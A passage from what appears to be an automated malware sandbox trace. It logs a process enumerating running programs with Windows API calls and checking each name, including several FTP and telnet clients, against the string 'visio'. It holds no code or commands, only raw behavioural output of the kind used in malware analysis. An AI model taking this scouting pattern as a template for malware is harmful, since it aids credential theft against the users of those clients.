| out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0100.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0100.189] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356bed8 [0100.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356bed8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0100.189] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0100.189] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="visio") returned 0x0 [0100.189] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0100.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.194] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357df88 [0100.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357df88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0100.194] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0100.194] StrStrIA (lpFirst="nights-attending.exe", lpSrch="visio") returned 0x0 [0100.194] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0100.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.195] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357ceb8 [0100.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x357ceb8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0100.195] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0100.196] StrStrIA (lpFirst="installed.exe", lpSrch="visio") returned 0x0 [0100.196] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0100.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0100.197] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356c018 [0100.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356c018, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0100.197] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0100.197] StrStrIA (lpFirst="references compounds.exe", lpSrch="visio") returned 0x0 [0100.197] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0100.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.198] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357de28 [0100.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357de28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0100.198] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0100.198] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="visio") returned 0x0 [0100.198] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0100.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.199] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357dfc8 [0100.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357dfc8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0100.199] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0100.199] StrStrIA (lpFirst="registered try.exe", lpSrch="visio") returned 0x0 [0100.199] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0100.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.200] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356be38 [0100.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356be38, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0100.200] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0100.201] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="visio") returned 0x0 [0100.201] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0100.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.202] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357ced0 [0100.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x357ced0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0100.202] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0100.202] StrStrIA (lpFirst="invite.exe", lpSrch="visio") returned 0x0 [0100.202] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0100.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0100.203] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357cee8 [0100.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x357cee8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0100.203] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0100.203] StrStrIA (lpFirst="idol.exe", lpSrch="visio") returned 0x0 [0100.203] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0100.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.204] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356c0b8 [0100.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356c0b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0100.204] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0100.204] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="visio") returned 0x0 [0100.204] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0100.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.205] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356c130 [0100.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356c130, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0100.205] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0100.205] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="visio") returned 0x0 [0100.205] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0100.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.206] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357cf00 [0100.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x357cf00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0100.206] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0100.206] StrStrIA (lpFirst="powell_jane.exe", lpSrch="visio") returned 0x0 [0100.206] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0100.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.207] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357e048 [0100.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357e048, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0100.208] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0100.208] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="visio") returned 0x0 [0100.208] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0100.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.209] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357b2c8 [0100.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x357b2c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0100.209] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0100.209] StrStrIA (lpFirst="gainedshape.exe", lpSrch="visio") returned 0x0 [0100.209] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0100.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.210] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357ddc8 [0100.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357ddc8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0100.210] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0100.210] StrStrIA (lpFirst="opens-versions.exe", lpSrch="visio") returned 0x0 [0100.210] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0100.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.211] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356bf50 [0100.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356bf50, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0100.211] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0100.211] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="visio") returned 0x0 [0100.211] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0100.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.212] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b298 [0100.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x357b298, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.212] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0100.212] StrStrIA (lpFirst="3dftp.exe", lpSrch="visio") returned 0x0 [0100.212] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0100.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.213] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357de08 [0100.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357de08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0100.213] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0100.213] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="visio") returned 0x0 [0100.213] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0100.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.214] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b160 [0100.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x357b160, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.214] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0100.214] StrStrIA (lpFirst="alftp.exe", lpSrch="visio") returned 0x0 [0100.214] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0100.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.215] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b328 [0100.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x357b328, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0100.215] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0100.215] StrStrIA (lpFirst="barca.exe", lpSrch="visio") returned 0x0 [0100.216] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0100.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.217] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b310 [0100.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x357b310, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0100.217] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0100.217] StrStrIA (lpFirst="bitkinex.exe", lpSrch="visio") returned 0x0 [0100.217] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0100.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.218] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b2b0 [0100.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x357b2b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0100.218] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0100.218] StrStrIA (lpFirst="coreftp.exe", lpSrch="visio") returned 0x0 [0100.218] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0100.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.219] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574ff0 [0100.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574ff0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0100.219] lstrcpyA 